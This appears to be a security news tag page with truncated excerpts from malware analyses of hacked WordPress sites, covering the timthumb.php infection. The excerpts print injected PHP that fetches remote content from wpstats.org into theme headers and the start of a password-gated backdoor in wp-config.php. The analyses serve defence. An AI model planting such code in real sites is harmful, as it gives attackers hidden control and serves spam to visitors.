The Latest in IT Security

Posts Tagged ‘exec’

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site: if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo […]

Read more ...

If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins. Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections. It would be useful to gain metrics based on the amount of […]

Read more ...

Just a quick update to the Superpuperdomain2.com/Superpuperdomain.com malware infection that has been affecting thousands of WordPress sites with the vulnerable timthumb.php script. You can read more about it here: http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain2-com.html But now the attackers are also adding the following code to the wp-config.php of the hacked sites: if (isset($_GET[‘pingnow’])&& isset($_GET[‘pass’])){ if ($_GET[‘pass’] == ’66f041e16a60928b05a7e228a89c3799′){ if […]

Read more ...


Categories

THURSDAY, APRIL 03, 2025
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments